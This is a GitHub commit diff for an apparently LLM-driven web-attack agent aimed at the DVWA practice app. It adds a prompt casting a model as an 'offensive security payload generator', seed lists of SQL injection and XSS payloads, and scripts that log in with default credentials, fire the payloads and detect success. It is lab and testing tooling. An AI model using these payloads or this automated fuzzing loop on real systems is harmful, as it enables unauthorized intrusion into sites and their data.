Add files via upload

This commit is contained in:
Joas A Santos
2025-08-17 11:32:14 -03:00
committed by GitHub
parent 83be0e8210
commit 90d5bafed7
21 changed files with 376 additions and 4 deletions

View File

@@ -5,3 +5,4 @@ pydantic>=2.8.0
tenacity>=8.2.3
rich>=13.7.1
python-dotenv>=1.0.1
requests>=2.32.3

Binary file not shown.

View File

@@ -3,7 +3,7 @@ For MVP we call hardcoded skills; planner integration is available for future lo
"""
from typing import Dict, Any, Callable
from . import planner
from ..skills import login, xss_reflected_low, sqli_low, xss_stored_low, xss_dom_low
from ..skills import login, xss_reflected_low, sqli_low, xss_stored_low, xss_dom_low, xss_reflected_low_smart, sqli_low_smart
SKILLS: Dict[str, Callable[[str], Dict[str, Any]]] = {
"login": lambda base: login.run(base),
@@ -11,6 +11,8 @@ SKILLS: Dict[str, Callable[[str], Dict[str, Any]]] = {
"xss_reflected_low": lambda base: xss_reflected_low.run(base),
"xss_dom_low": lambda base: xss_dom_low.run(base),
"sqli_low": lambda base: sqli_low.run(base),
"sqli_low_smart": lambda base: sqli_low_smart.run(base),
"xss_reflected_low_smart": lambda base: xss_reflected_low_smart.run(base),
}
def run_skill(base_url: str, skill: str) -> Dict[str, Any]:

View File

@@ -1,4 +1,39 @@
from ..openai_client import plan_next_action
from typing import Dict, Any, List
from ..models import get_provider
_provider = get_provider()
def decide(context: dict) -> dict:
return plan_next_action(context)
"""Mantém compat com o antigo: planejar uma ação simples."""
system = "You are a safe web security agent. Return STRICT JSON."
user = (
"Given this context, propose one next action as JSON:\n"
"{'tool':'navigate|fill_form|click|noop','target':'url|selector','data':null|{...},'why':'short'}\n\n"
f"Context:\n{context}"
)
res = _provider.complete_json(system, user)
if not isinstance(res, dict):
res = {"tool":"noop","target":"","data":None,"why":"fallback"}
return res
def propose_fuzz_payloads(category: str, page_context: dict, seeds: List[str], budget: int=8) -> List[str]:
"""Pede ao modelo variações de payload com base nos seeds e contexto da página."""
system = "You are an offensive security payload generator. Return STRICT JSON: {'payloads': [..]}."
user = (
f"Category: {category}\n"
f"Seeds: {seeds}\n"
f"Page context (inputs, hints, server msgs): {page_context}\n"
f"Generate up to {budget} diverse payloads. Focus on low-noise, high-signal candidates for DVWA Low.\n"
"Only return JSON: {'payloads': ['...','...']}."
)
res = _provider.complete_json(system, user)
pls = res.get("payloads", []) if isinstance(res, dict) else []
# sanity filter
uniq = []
for p in pls:
if not isinstance(p, str): continue
p = p.strip()
if p and p not in uniq and len(p) < 256:
uniq.append(p)
# fallback: se nada vier, retorne seeds
return uniq or seeds[:budget]

View File

@@ -2,8 +2,22 @@ from pydantic import BaseModel
import os
class Settings(BaseModel):
# Provider: "openai", "ollama", "llamacpp"
model_provider: str = os.getenv("MODEL_PROVIDER", "openai").lower()
# OpenAI
openai_api_key: str = os.getenv("OPENAI_API_KEY", "")
openai_model: str = os.getenv("OPENAI_MODEL", "gpt-5")
# Ollama (LLaMA)
llama_base_url: str = os.getenv("LLAMA_BASE_URL", "http://localhost:11434")
llama_model: str = os.getenv("LLAMA_MODEL", "llama3.1") # ex: llama3.1, llama3.2:latest
# llama.cpp (local python)
llamacpp_model_path: str = os.getenv("LLAMACPP_MODEL_PATH", "")
llamacpp_n_threads: int = int(os.getenv("LLAMACPP_N_THREADS", "4"))
# Safety / target
allowlist_hosts: list[str] = [h.strip() for h in os.getenv("ALLOWLIST_HOSTS", "localhost,127.0.0.1,dvwa").split(",")]
dvwa_url_env: str = os.getenv("DVWA_URL", "").strip()
headless: bool = os.getenv("HEADLESS", "true").lower() == "true"

Binary file not shown.

Binary file not shown.

20
src/fuzz/engine.py Normal file
View File

@@ -0,0 +1,20 @@
from typing import List, Dict, Any, Callable
from ..agent.planner import propose_fuzz_payloads
def generate_candidates(category: str, page_ctx: dict, seeds: List[str], budget: int=8) -> List[str]:
"""Combina seeds + LLM proposals."""
props = propose_fuzz_payloads(category, page_ctx, seeds, budget)
pool = list(dict.fromkeys(seeds + props)) # dedup preservando ordem
return pool[: max(budget, len(seeds))]
def try_candidates(try_func: Callable[[str], Dict[str, Any]], candidates: List[str]) -> Dict[str, Any]:
"""Executa candidatos até achar sucesso, retornando o melhor resultado."""
best = {"ok": False}
for p in candidates:
res = try_func(p)
if res.get("ok"):
return res
# guarda “quase bom” se tiver um reason/signal
if not best.get("ok") and len(res.get("evidence_excerpt","")) > len(best.get("evidence_excerpt","")):
best = res
return best

19
src/fuzz/seeds.py Normal file
View File

@@ -0,0 +1,19 @@
SQLI_SEEDS = [
"1' OR '1'='1' -- ",
"' OR '1'='1' -- ",
"1' OR 1=1 -- ",
"1' OR '1'='1'#",
]
XSS_REFLECTED_SEEDS = [
'<script>alert("x")</script>',
'"><script>alert(1)</script>',
'<img src=x onerror=alert(1)>',
'<svg onload=alert(1)>',
]
XSS_DOM_SEEDS = [
'<script>alert("domxss")</script>',
'"><script>alert(document.domain)</script>',
'<img src=x onerror=alert("dom")>',
]

1
src/models/__init__.py Normal file
View File

@@ -0,0 +1 @@
from .provider import get_provider

Binary file not shown.

Binary file not shown.

144
src/models/provider.py Normal file
View File

@@ -0,0 +1,144 @@
from typing import Dict, Any, List
from ..config import settings
# OpenAI (novo SDK 1.x)
def _openai_client():
from openai import OpenAI
return OpenAI(api_key=settings.openai_api_key)
class BaseProvider:
def name(self) -> str: ...
def complete_json(self, system: str, user: str) -> Dict[str, Any]:
"""Return parsed JSON (tool choice / payload proposals)."""
raise NotImplementedError
class OpenAIProvider(BaseProvider):
def name(self):
return "openai"
def complete_json(self, system: str, user: str) -> Dict[str, Any]:
"""
Tenta primeiro via Chat Completions com response_format JSON.
Se a versão do SDK/modelo não suportar, cai para texto puro + parse.
Por fim, tenta a Responses API sem response_format.
"""
import json, re
client = _openai_client()
# 1) Chat Completions com JSON (preferido)
try:
chat = client.chat.completions.create(
model=settings.openai_model,
messages=[
{"role": "system", "content": system},
{"role": "user", "content": user + "\nReturn STRICT JSON only."},
],
temperature=0.2,
top_p=0.9,
# algumas versões do SDK suportam isso; se não, cai no except
response_format={"type": "json_object"},
)
txt = chat.choices[0].message.content or "{}"
return json.loads(txt)
except Exception:
pass
# 2) Chat Completions sem response_format (parse heurístico)
try:
chat = client.chat.completions.create(
model=settings.openai_model,
messages=[
{"role": "system", "content": system},
{"role": "user", "content": user + "\nReturn STRICT JSON only."},
],
temperature=0.2,
top_p=0.9,
)
txt = chat.choices[0].message.content or "{}"
try:
return json.loads(txt)
except Exception:
m = re.search(r"\{.*\}", txt, re.S)
return json.loads(m.group(0)) if m else {}
except Exception:
pass
# 3) Responses API (fallback), SEM response_format
try:
resp = client.responses.create(
model=settings.openai_model,
input=[
{"role":"system","content":system},
{"role":"user","content":user + "\nReturn STRICT JSON only."},
],
temperature=0.2,
top_p=0.9,
max_output_tokens=600,
)
# diferentes versões expõem campos distintos:
try:
txt = resp.output_text
except Exception:
# tente extrair do conteúdo estruturado
try:
blocks = resp.output
# concatena textos
txt = "".join([b.text if hasattr(b, "text") else "" for b in (blocks or [])]) or "{}"
except Exception:
txt = "{}"
try:
return json.loads(txt)
except Exception:
m = re.search(r"\{.*\}", txt, re.S)
return json.loads(m.group(0)) if m else {}
except Exception:
# último fallback: dict vazio (engine usa seeds)
return {}
class OllamaProvider(BaseProvider):
def name(self): return "ollama"
def complete_json(self, system: str, user: str) -> Dict[str, Any]:
import requests, json
url = settings.llama_base_url.rstrip("/") + "/api/generate"
prompt = f"[SYSTEM]{system}\n[USER]{user}\nReturn STRICT JSON only."
r = requests.post(url, json={
"model": settings.llama_model,
"prompt": prompt,
"stream": False,
"options": {"temperature":0.2}
}, timeout=120)
r.raise_for_status()
txt = r.json().get("response","{}")
try:
return json.loads(txt)
except Exception:
# tentativa robusta: extrair bloco {...}
import re
m = re.search(r"\{.*\}", txt, re.S)
return json.loads(m.group(0)) if m else {}
class LlamaCppProvider(BaseProvider):
def name(self): return "llamacpp"
def complete_json(self, system: str, user: str) -> Dict[str, Any]:
# requer: pip install llama-cpp-python
from llama_cpp import Llama
import json, re, os
llm = Llama(model_path=settings.llamacpp_model_path, n_threads=settings.llamacpp_n_threads, verbose=False)
prompt = f"[SYSTEM]{system}\n[USER]{user}\nReturn STRICT JSON only."
out = llm(prompt=prompt, max_tokens=600, temperature=0.2)
txt = out["choices"][0]["text"]
try:
return json.loads(txt)
except Exception:
m = re.search(r"\{.*\}", txt, re.S)
return json.loads(m.group(0)) if m else {}
def get_provider() -> BaseProvider:
prov = settings.model_provider
if prov == "openai":
return OpenAIProvider()
if prov == "ollama":
return OllamaProvider()
if prov == "llamacpp":
return LlamaCppProvider()
return OpenAIProvider()

View File

@@ -5,7 +5,7 @@ from .agent.orchestrator import run_skill
def main():
ap = argparse.ArgumentParser()
ap.add_argument('--target', required=False, default=settings.dvwa_url_env or "http://localhost:8080")
ap.add_argument('--skill', required=True, choices=['login','xss_reflected_low','sqli_low', 'xss_stored_low', 'xss_dom_low'])
ap.add_argument('--skill', required=True, choices=['login','xss_reflected_low','sqli_low', 'xss_stored_low', 'xss_dom_low', 'sqli_low_smart', 'xss_reflected_low_smart'])
args = ap.parse_args()
result = run_skill(args.target, args.skill)

Binary file not shown.

View File

@@ -0,0 +1,68 @@
from pathlib import Path
from urllib.parse import urlencode
from ..tools.browser import Browser
from ..detectors.sql_errors import has_sql_error
from ..fuzz.engine import generate_candidates, try_candidates
from ..fuzz.seeds import SQLI_SEEDS
def run(base_url: str, budget: int = 8) -> dict:
with Browser(base_url) as b:
# login
b.goto("/login.php")
b.page.wait_for_selector('input[name="username"]', timeout=15000)
b.fill('input[name="username"]', "admin")
b.fill('input[name="password"]', "password")
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# best effort low
try:
b.goto("/security.php")
b.page.wait_for_selector('select[name="security"]', timeout=5000)
b.page.select_option('select[name="security"]', 'low')
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
except Exception:
pass
# baseline
b.goto("/vulnerabilities/sqli/?id=1&Submit=Submit")
b.page.wait_for_load_state("domcontentloaded")
base_html = b.content()
base_len = len(base_html)
def success_metrics(html: str):
if has_sql_error(html): return True, "SQL error pattern"
if ("First name" in html and "Surname" in html): return True, "User table markers"
if ("User ID" in html and "exists in the database" in html): return True, "Exists message"
if len(html) > base_len + 150: return True, "Delta size grew"
return False, ""
# gerar candidatos com LLM (contexto simples da página)
page_ctx = {"markers":["id input","Submit button"], "base_len": base_len}
candidates = generate_candidates("SQLiLow", page_ctx, SQLI_SEEDS, budget)
def try_one(p: str):
qs = urlencode({"id": p, "Submit": "Submit"})
b.goto(f"/vulnerabilities/sqli/?{qs}")
b.page.wait_for_load_state("domcontentloaded")
html = b.content()
ok, reason = success_metrics(html)
# screenshot
screens = Path(__file__).resolve().parents[2].parent / "screens"
screens.mkdir(parents=True, exist_ok=True)
shot = screens / "sqli_low_smart.png"
b.page.screenshot(path=str(shot), full_page=True)
return {
"ok": ok,
"vector": "SQLi (Low) SMART",
"payload": p,
"reason": reason,
"evidence_excerpt": html[:1200],
"screenshot": str(shot),
"url": b.page.url,
}
return try_candidates(try_one, candidates)

View File

@@ -0,0 +1,68 @@
from pathlib import Path
from ..tools.browser import Browser
from ..fuzz.engine import generate_candidates, try_candidates
from ..fuzz.seeds import XSS_REFLECTED_SEEDS
def run(base_url: str, budget: int=8) -> dict:
with Browser(base_url) as b:
# login
b.goto("/login.php")
b.page.wait_for_selector('input[name="username"]', timeout=15000)
b.fill('input[name="username"]', "admin")
b.fill('input[name="password"]', "password")
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# low
try:
b.goto("/security.php")
b.page.wait_for_selector('select[name="security"]', timeout=5000)
b.page.select_option('select[name="security"]', 'low')
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
except Exception:
pass
# hook de alert()
alert = {"ok": False, "message": ""}
def on_dialog(d):
alert["ok"] = True
alert["message"] = d.message
d.accept()
b.page.on("dialog", on_dialog)
# contexto e candidatos
b.goto("/vulnerabilities/xss_r/")
b.page.wait_for_selector('input[name="name"]', timeout=15000)
page_ctx = {"form":"name", "page": "xss_reflected"}
candidates = generate_candidates("XSSReflectedLow", page_ctx, XSS_REFLECTED_SEEDS, budget)
def try_one(p: str):
b.goto("/vulnerabilities/xss_r/")
b.page.wait_for_selector('input[name="name"]', timeout=15000)
b.fill('input[name="name"]', p)
b.click('input[type="submit"]')
b.page.wait_for_timeout(900)
html = b.content()
raw_present = "<script" in html and "alert(" in html
ok = alert["ok"] or raw_present
reason = (f'alert fired: "{alert["message"]}"' if alert["ok"]
else "raw <script> present" if raw_present else "no execution")
screens = Path(__file__).resolve().parents[2].parent / "screens"
screens.mkdir(parents=True, exist_ok=True)
shot = screens / "xss_reflected_low_smart.png"
b.page.screenshot(path=str(shot), full_page=True)
return {
"ok": ok,
"vector": "Reflected XSS (Low) SMART",
"payload": p,
"reason": reason,
"evidence_contains": p if raw_present else html[:1000],
"screenshot": str(shot),
"url": b.page.url,
}
return try_candidates(try_one, candidates)